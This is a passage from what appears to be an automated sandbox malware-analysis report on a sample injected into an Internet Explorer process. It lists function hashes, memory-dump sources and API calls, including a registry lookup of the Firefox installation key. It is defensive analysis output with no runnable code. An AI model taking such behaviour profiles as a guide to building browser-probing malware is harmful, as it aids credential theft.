      • Instruction ID: 5a79727a6ec1d71b7ee9dfec593f804db3835c833cc42b82a7c6b29c62ee9884
      • Opcode Fuzzy Hash: 11106ed03d2601f68a55a56d557a3635eb194681e91bb89c85851ac9109f557e
      • Instruction Fuzzy Hash: FA016DB1A0021CABDF15EBA8DC05BEDB7BDAB48204F4000D5E609E3291D774AF598FA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0300E02A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3_catch
      • String ID: @$@
      • API String ID: 3886170330-149943524
      • Opcode ID: 1b11bc5207c6a27aaebbfae167115acfb506d44845b26654eb1a7bfa8e8687ec
      • Instruction ID: f6164dd03fb246b8e3bf5306ac13d5d9c2e1802445418c2b3d81decc135bdaf7
      • Opcode Fuzzy Hash: 1b11bc5207c6a27aaebbfae167115acfb506d44845b26654eb1a7bfa8e8687ec
      • Instruction Fuzzy Hash: D6E039B5802349EBDF50DF54CA416DE3760BB00320F518904F825AA1D0C3759FA08B91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B4B841 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21registryCOMMON
      Download Yara Rule
      APIs
      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Mozilla\Mozilla Firefox,00000000,00000001,00000000), ref: 04B4B85B
      • RegCloseKey.ADVAPI32(00000000), ref: 04B4B86C
      Strings
      • SOFTWARE\Mozilla\Mozilla Firefox, xrefs: 04B4B851
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CloseOpen
      • String ID: SOFTWARE\Mozilla\Mozilla Firefox
      • API String ID: 47109696-1156142290
      • Opcode ID: 5d95f3c348d9dd57de76e04a9efc99b8017c4bf6c7eba6812be02fdfc51cb766
      • Instruction ID: 0b0066be399c667f2f72b460e1c9a33169b051f7453513036fe4a019b0da69f2
      • Opcode Fuzzy Hash: 5d95f3c348d9dd57de76e04a9efc99b8017c4bf6c7eba6812be02fdfc51cb766
      • Instruction Fuzzy Hash: AEE01234650308FBEF108BB5DD07BD977ACEB04B89F104094F501E6290C7A5EA10BA74
      Uniqueness

      Uniqueness Score: -1.00%